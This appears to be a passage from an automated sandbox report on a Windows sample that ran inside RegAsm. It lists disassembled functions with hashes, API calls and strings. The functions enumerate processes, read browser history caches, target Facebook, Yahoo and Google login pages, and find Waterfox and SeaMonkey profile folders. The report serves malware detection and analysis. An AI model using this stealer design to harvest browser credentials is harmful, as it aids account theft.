                                                                                • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                                                • Opcode Fuzzy Hash: 0f77db0472bd63cf26258024439ab2a975461d6804070ba6b678b1f2ee2b0392
                                                                                • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99
                                                                                Function 00413D4C Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 142processCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 505 413d4c-413da0 call 40b633 CreateToolhelp32Snapshot memset Process32FirstW 508 413f00-413f11 Process32NextW 505->508 509 413da5-413ded OpenProcess 508->509 510 413f17-413f24 CloseHandle 508->510 511 413eb0-413eb5 509->511 512 413df3-413e26 memset call 413f27 509->512 511->508 513 413eb7-413ebd 511->513 519 413e79-413eae call 413959 call 413ca4 CloseHandle 512->519 520 413e28-413e35 512->520 516 413ec8-413eda call 4099f4 513->516 517 413ebf-413ec6 ??3@YAXPAX@Z 513->517 518 413edb-413ee2 516->518 517->518 525 413ee4 518->525 526 413ee7-413efe 518->526 519->511 522 413e61-413e68 520->522 523 413e37-413e44 GetModuleHandleW 520->523 522->519 529 413e6a-413e77 QueryFullProcessImageNameW 522->529 523->522 528 413e46-413e5c 523->528 525->526 526->508 528->522 529->519
                                                                                APIs
                                                                                  • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00413D6A
                                                                                • memset.MSVCRT ref: 00413D7F
                                                                                • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                                                • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                                                • memset.MSVCRT ref: 00413E07
                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                                                • QueryFullProcessImageNameW.KERNEL32(00000000,00000000,?,00000104,00000000,?), ref: 00413E77
                                                                                • CloseHandle.KERNEL32(?), ref: 00413EA8
                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 00413EC1
                                                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                                                • CloseHandle.KERNEL32(00000000), ref: 00413F1A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Handle$??3@CloseProcessProcess32memset$CreateFirstFullImageModuleNameNextOpenQuerySnapshotToolhelp32
                                                                                • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                • API String ID: 3791284831-1740548384
                                                                                • Opcode ID: 49940329a591e45662842b0713840e3f666fa521b7868de24c85cfebece9aff1
                                                                                • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                                                • Opcode Fuzzy Hash: 49940329a591e45662842b0713840e3f666fa521b7868de24c85cfebece9aff1
                                                                                • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9
                                                                                Function 0040E01E Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 120fileCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                  • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                                  • Part of subcall function 0040DD85: CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                  • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                  • Part of subcall function 0040DD85: CloseHandle.KERNEL32(C0000004), ref: 0040DE3E
                                                                                  • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                  • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                • DuplicateHandle.KERNEL32(?,00000104,00000000), ref: 0040E0BF
                                                                                • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                  • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?), ref: 00409A5C
                                                                                  • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                  • Part of subcall function 00409A45: GetTempFileNameW.KERNEL32(?,0040B827,00000000,?), ref: 00409A85
                                                                                  • Part of subcall function 004096DC: CreateFileW.KERNEL32(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                • WriteFile.KERNEL32(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                • CloseHandle.KERNEL32(?), ref: 0040E13E
                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                                                • CloseHandle.KERNEL32(?), ref: 0040E148
                                                                                • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                                                • String ID: bhv
                                                                                • API String ID: 4234240956-2689659898
                                                                                • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                                                • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8
                                                                                Function 004466F4 Relevance: 18.1, APIs: 12, Instructions: 134COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 562 4466f4-44670e call 446904 GetModuleHandleA 565 446710-44671b 562->565 566 44672f-446732 562->566 565->566 567 44671d-446726 565->567 568 44675b-4467aa __set_app_type __p__fmode __p__commode call 4153f2 566->568 570 446747-44674b 567->570 571 446728-44672d 567->571 575 4467ac-4467b7 __setusermatherr 568->575 576 4467b8-44680e call 4468f0 _initterm GetEnvironmentStringsW _initterm 568->576 570->566 574 44674d-44674f 570->574 571->566 573 446734-44673b 571->573 573->566 577 44673d-446745 573->577 578 446755-446758 574->578 575->576 581 446810-446819 576->581 582 44681e-446825 576->582 577->578 578->568 583 4468d8-4468dd call 44693d 581->583 584 446827-446832 582->584 585 44686c-446870 582->585 588 446834-446838 584->588 589 44683a-44683e 584->589 586 446845-44684b 585->586 587 446872-446877 585->587 593 446853-446864 GetStartupInfoW 586->593 594 44684d-446851 586->594 587->585 588->584 588->589 589->586 591 446840-446842 589->591 591->586 595 446866-44686a 593->595 596 446879-44687b 593->596 594->591 594->593 597 44687c-446894 GetModuleHandleA call 41276d 595->597 596->597 600 446896-446897 exit 597->600 601 44689d-4468d6 _cexit 597->601 600->601 601->583
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(00000000,0044E4C0,00000070), ref: 00446703
                                                                                • __set_app_type.MSVCRT ref: 00446762
                                                                                • __p__fmode.MSVCRT ref: 00446777
                                                                                • __p__commode.MSVCRT ref: 00446785
                                                                                • __setusermatherr.MSVCRT ref: 004467B1
                                                                                • _initterm.MSVCRT ref: 004467C7
                                                                                • GetEnvironmentStringsW.KERNEL32(?,?,?,?,0044E494,0044E498), ref: 004467EA
                                                                                • _initterm.MSVCRT ref: 004467FD
                                                                                • GetStartupInfoW.KERNEL32(?), ref: 0044685A
                                                                                • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00446880
                                                                                • exit.MSVCRT ref: 00446897
                                                                                • _cexit.MSVCRT ref: 0044689D
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: HandleModule_initterm$EnvironmentInfoStartupStrings__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                                                • String ID:
                                                                                • API String ID: 2791496988-0
                                                                                • Opcode ID: ac973ed8bce866ca224172ea4b7a237c44716a7d542afe8b7082d44fa5742df9
                                                                                • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                                                                                • Opcode Fuzzy Hash: ac973ed8bce866ca224172ea4b7a237c44716a7d542afe8b7082d44fa5742df9
                                                                                • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E
                                                                                Function 0040C274 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 112COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • memset.MSVCRT ref: 0040C298
                                                                                  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                  • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                                                  • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                • wcschr.MSVCRT ref: 0040C324
                                                                                • wcschr.MSVCRT ref: 0040C344
                                                                                • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                • GetLastError.KERNEL32 ref: 0040C373
                                                                                • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                                                • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstFolderLastPathSpecial
                                                                                • String ID: visited:
                                                                                • API String ID: 2470578098-1702587658
                                                                                • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                                                • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9
                                                                                Function 0040E175 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 91COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 628 40e175-40e1a1 call 40695d call 406b90 633 40e1a7-40e1e5 memset 628->633 634 40e299-40e2a8 call 4069a3 628->634 636 40e1e8-40e1fa call 406e8f 633->636 640 40e270-40e27d call 406b53 636->640 641 40e1fc-40e219 call 40dd50 * 2 636->641 640->636 647 40e283-40e286 640->647 641->640 652 40e21b-40e21d 641->652 648 40e291-40e294 call 40aa04 647->648 649 40e288-40e290 ??3@YAXPAX@Z 647->649 648->634 649->648 652->640 653 40e21f-40e235 call 40742e 652->653 653->640 656 40e237-40e242 call 40aae3 653->656 656->640 659 40e244-40e26b _snwprintf call 40a8d0 656->659 659->640
                                                                                APIs
                                                                                  • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                • memset.MSVCRT ref: 0040E1BD
                                                                                  • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                                                                                  • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                  • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                                                  • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                                                • _snwprintf.MSVCRT ref: 0040E257
                                                                                  • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                  • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                                                  • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                                                  • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: ??3@$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                                                • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                                                • API String ID: 3883404497-2982631422
                                                                                • Opcode ID: 366cc36c026cd150a239da38b4c6b1e2e10dbbf4b03b5b4663773bd365af82a7
                                                                                • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                                                • Opcode Fuzzy Hash: 366cc36c026cd150a239da38b4c6b1e2e10dbbf4b03b5b4663773bd365af82a7
                                                                                • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99
                                                                                Function 0040BB98 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 145COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                  • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                  • Part of subcall function 0040CC26: CloseHandle.KERNEL32(?), ref: 0040CC98
                                                                                  • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                • memset.MSVCRT ref: 0040BC75
                                                                                • memset.MSVCRT ref: 0040BC8C
                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                                                • memcmp.MSVCRT ref: 0040BCD6
                                                                                • memcpy.MSVCRT ref: 0040BD2B
                                                                                • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
                                                                                • String ID:
                                                                                • API String ID: 115830560-3916222277
                                                                                • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                                                • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99
                                                                                Function 00412465 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 88windowCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                                                • String ID: r!A
                                                                                • API String ID: 2791114272-628097481
                                                                                • Opcode ID: e760b227a922d4e3f094a9eb3eb7a7fe7130a7247a75f8eef54ce2a40c46c596
                                                                                • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                                                • Opcode Fuzzy Hash: e760b227a922d4e3f094a9eb3eb7a7fe7130a7247a75f8eef54ce2a40c46c596
                                                                                • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
                                                                                Function 0040C768 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 87COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                  • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                                                                                  • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                                                                                  • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
                                                                                  • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                                                  • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                  • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                                                  • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                                                  • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                  • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                                                  • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                                                  • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                  • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                                                  • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                                                  • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                • _wcslwr.MSVCRT ref: 0040C817
                                                                                  • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                                                  • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                                                • wcslen.MSVCRT ref: 0040C82C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: memset$??3@$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                                                • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                                                • API String ID: 62308376-4196376884
                                                                                • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                                                • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                                                                                Function 0040B58D Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 770 40b58d-40b59e 771 40b5a4-40b5c0 GetModuleHandleW FindResourceW 770->771 772 40b62e-40b632 770->772 773 40b5c2-40b5ce LoadResource 771->773 774 40b5e7 771->774 773->774 775 40b5d0-40b5e5 SizeofResource LockResource 773->775 776 40b5e9-40b5eb 774->776 775->776 776->772 777 40b5ed-40b5ef 776->777 777->772 778 40b5f1-40b629 call 40afcf memcpy call 40b4d3 call 40b3c1 call 40b04b 777->778 778->772
                                                                                APIs
                                                                                • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                                                                                • FindResourceW.KERNEL32(00000000,00000032,BIN), ref: 0040B5B6
                                                                                • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                                                • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                                                • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                                                • memcpy.MSVCRT ref: 0040B60D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                                                • String ID: BIN
                                                                                • API String ID: 1668488027-1015027815
                                                                                • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                                                • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                                                                Function 00403C9C Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • memset.MSVCRT ref: 00403CBF
                                                                                • memset.MSVCRT ref: 00403CD4
                                                                                • memset.MSVCRT ref: 00403CE9
                                                                                • memset.MSVCRT ref: 00403CFE
                                                                                • memset.MSVCRT ref: 00403D13
                                                                                  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                  • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                • memset.MSVCRT ref: 00403DDA
                                                                                  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                  • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                • String ID: Waterfox$Waterfox\Profiles
                                                                                • API String ID: 4039892925-11920434
                                                                                • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                                                • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                                                                Function 00403E2D Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • memset.MSVCRT ref: 00403E50
                                                                                • memset.MSVCRT ref: 00403E65
                                                                                • memset.MSVCRT ref: 00403E7A
                                                                                • memset.MSVCRT ref: 00403E8F
                                                                                • memset.MSVCRT ref: 00403EA4
                                                                                  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                  • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                • memset.MSVCRT ref: 00403F6B
                                                                                  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                  • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                                                • API String ID: 4039892925-2068335096
                                                                                • Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                                • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                                                                • Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                                • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                                                                Function 00403FBE Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • memset.MSVCRT ref: 00403FE1
                                                                                • memset.MSVCRT ref: 00403FF6
                                                                                • memset.MSVCRT ref: 0040400B
                                                                                • memset.MSVCRT ref: 00404020
                                                                                • memset.MSVCRT ref: 00404035
                                                                                  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
